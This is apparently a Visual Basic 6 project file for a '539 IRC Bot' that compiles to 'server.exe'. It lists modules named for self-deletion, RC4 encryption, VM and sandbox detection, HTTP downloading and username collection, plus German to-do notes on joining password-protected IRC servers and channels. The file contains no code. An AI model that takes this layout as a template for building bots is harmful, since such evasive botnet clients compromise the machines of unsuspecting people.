Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Object={BDC217C8-ED16-11CD-956C-0000C04E4C0A}#1.1#0; TABCTL32.OCX
Object={5E9E78A0-531B-11CF-91F6-C2863C385E30}#1.0#0; MSFLXGRD.OCX
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Object={831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCTL.OCX
Object={86CF1D34-0C5F-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCT2.OCX
Object={48E59290-9880-11CF-9754-00AA00C00908}#1.0#0; MSINET.OCX
Object={3B7C8863-D78F-101B-B9B5-04021C009402}#1.2#0; RICHTX32.OCX
Object={65E121D4-0C60-11D2-A9FC-0000F8754DA1}#2.0#0; MSCHRT20.OCX
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; mswinsck.ocx
Object={20C62CAE-15DA-101B-B9A8-444553540000}#1.1#0; MSMAPI32.OCX
Object={C1A8AF28-1257-101B-8FB0-0020AF039CA3}#1.1#0; MCI32.OCX
Object={27395F88-0C0C-101B-A3C9-08002B2F49FB}#1.1#0; PICCLP32.OCX
Object={6FBA474E-43AC-11CE-9A0E-00AA0062BB4C}#1.0#0; SYSINFO.OCX
Object={648A5603-2C6E-101B-82B6-000000000014}#1.1#0; MSCOMM32.OCX
Object={C932BA88-4374-101B-A56C-00AA003668DC}#1.1#0; MSMASK32.OCX
Object={CDE57A40-8B86-11D0-B3C6-00A0C90AEA82}#1.0#0; MSDATGRD.OCX
Object={F0D2F211-CCB0-11D0-A316-00AA00688B10}#1.0#0; MSDATLST.OCX
Object={38911DA0-E448-11D0-84A3-00DD01104159}#1.1#0; COMCT332.OCX
Object={67397AA1-7FB1-11D0-B148-00A0C922E820}#6.0#0; MSADODC.OCX
Object={0ECD9B60-23AA-11D0-B351-00A0C9055D8E}#6.0#0; MSHFLXGD.OCX
Object={EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}#1.1#0; ieframe.dll
Form=Form1.frm
Module=modShowInTaskbarForm; modShowInTaskbarForm.bas
Module=Registry; Registry.bas
Module=modUsername; modUsername.bas
Module=modBlacklist; modBlacklist.bas
Module=modSelfKill; modSelfKill.bas
Module=modRC4; modRC4.bas
Module=modVM; modVM.bas
Module=modSonstiges; modSonstiges.bas
Module=modLog; modLog.bas
Module=modDownloadHTTP; modDownloadHTTP.bas
Module=mpdAntiSand; modAntiSand.bas
Module=modMain; modMain.bas
Module=modInfos; modInfos.bas
ResFile32="Project1.RES"
IconForm="Form1"
Startup="Sub Main"
HelpFile=""
Title="539 IRC Bot"
ExeName32="server.exe"
Path32="..\539 IRC Bot"
Command32=""
Name="Project1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=1
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionLegalCopyright="Five-Three-Nine"
CompilationType=-1
OptimizationType=1
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
RemoveUnusedControlInfo=0
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1

[TaskList]
Num=3

[TASK1]
Description=Server Pass
Status=0
Priority=2
Comment=Bot erlauben auf Passwortgeschütze Server zu verbinden

[TASK2]
Description=Channel Pass
Status=0
Priority=2
Comment=Channel Pass Erlauben

[TASK3]
Description=Neue Version von rootRock
Status=0
Priority=1
AssignedTo=
Comment=
